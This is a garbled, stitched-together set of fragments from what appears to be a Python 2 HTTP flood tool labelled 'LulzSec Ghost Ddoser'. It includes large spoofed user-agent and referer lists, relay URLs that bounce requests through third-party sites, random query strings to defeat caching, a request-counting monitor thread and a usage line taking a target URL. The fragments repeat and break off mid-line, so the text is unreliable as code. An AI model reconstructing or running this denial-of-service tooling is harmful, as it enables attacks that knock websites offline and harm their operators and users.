headers_useragents.append('AltaVista Intranet V2.0 Compaq", "Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux;", "V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search;", "if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads", "(KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS", "(KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') 
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags", "NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U;", "CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0", "http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0')", "headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X;", "[en] (v. 
4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)')", "(Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac", "like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac", "Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')", "bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\")", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') 
headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada", "(Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com", "Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=')", "/ / :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | /", "re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide')", "like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", 
"headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a", "libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0')", "Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500", "x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x", "artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot", "headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; 
http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler", "META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like", "Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11;", "G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad", "6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')", "(KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay", "headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac", "headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot", "NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer", "\\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... 
Lulz", "keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=')", "(KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36", "v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U;", "Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') 
keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines", "requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print", "6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET", "Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K)", "headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler;", "Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia", "i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def", "/-._; | : : :: ,. . 
,' :: /`-._| | | ||", "Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ", "headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1;", "U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML,", ".NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')", "// //~ // // ~~ _// _// _// ~ _// ~ ~ /", "NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38)", "keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ", "Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android", "4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 
2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)')", "set_flag(2) except Exception, ex: pass # monitors http threads and counts requests class", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML,", "headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for", "U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0')", "headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3;", "4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0", ";|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_", "NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0)", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') 
headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "`| : `' ,' `. / |`-:_ ; | | | : \\", "referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner +", "headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)')", "OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)", "v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)')", "(compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10", "headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler;", "(<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x 
(Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1", "headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)')", "headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')", "headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0", ";|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------'", "headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org;", "Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator", "(http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web", "C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 
4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global", "| : O ._O O_. O ._O O_. ; ; : `. //", ",' `. / |`-:_ ; | | | : \\ `--. ) /|-._:", "(KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)')", "( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27')", "240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U;", "headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx", "(KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible;", "like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net)", "en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1;", 
"bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str =", "like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36')", "Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "(AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google;", "isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02)", "(KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36", "MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC;", "headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0", ":: ,. . 
,' :: /`-._| | | || ' : `.`.) _,'", "// ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~", "/ ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~ _// ~", "headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0)", "headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0", "headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)')", "headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt", "(http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)')", "4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array", "keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') 
keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele')", "headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser", "headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4;", "set_safe(): global safe safe=1 # generates a user agent array def useragent_list(): global", "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global", "http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy", "(v. 
4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80", "(Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)", "http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')", "http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; 